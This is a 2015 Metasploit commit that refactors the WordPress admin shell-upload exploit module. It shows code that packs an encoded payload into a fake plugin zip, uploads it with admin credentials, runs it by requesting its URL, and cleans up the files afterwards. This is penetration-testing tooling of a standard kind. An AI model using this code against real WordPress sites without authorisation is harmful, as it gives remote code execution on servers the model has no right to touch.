Tidy up various bits of code

rastating · rastating · commit 708340ec5a49 · 2015-02-21T12:53:33.000Z
diff --git a/lib/msf/http/wordpress/helpers.rb b/lib/msf/http/wordpress/helpers.rb
@@ -132,6 +132,8 @@ def wordpress_helper_get_plugin_upload_nonce(cookie)
       'vars_get'  => { 'tab' => 'upload' }
     }
     res = send_request_cgi(options)
-    res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    if res && res.code == 200
+      return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
+    end
   end
 end
diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -48,16 +48,11 @@ def password
     datastore['PASSWORD']
   end
 
-  def referer_uri
-    normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
-  end
-
   def generate_plugin(plugin_name, payload_name)
-    r = Random.new
     plugin_script = %Q{<?php
 /**
  * Plugin Name: #{plugin_name}
- * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
  * Author: #{Rex::Text.rand_text_alpha(10)}
  * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
  * License: GPL2
@@ -66,7 +61,7 @@ def generate_plugin(plugin_name, payload_name)
 
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
-    zip.add_file("#{plugin_name}/#{payload_name}", payload.encoded)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
     zip
   end
 
@@ -80,16 +75,16 @@ def exploit
 
     print_status("#{peer} - Preparing payload...")
     plugin_name = Rex::Text.rand_text_alpha(10)
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
-    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_name)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
     zip = generate_plugin(plugin_name, payload_name)
 
     print_status("#{peer} - Uploading payload...")
     uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
     fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
     print_status("#{peer} - Executing the payload at #{payload_uri}...")
-    register_files_for_cleanup(payload_name)
+    register_files_for_cleanup("#{payload_name}.php")
     register_files_for_cleanup("#{plugin_name}.php")
     send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
   end
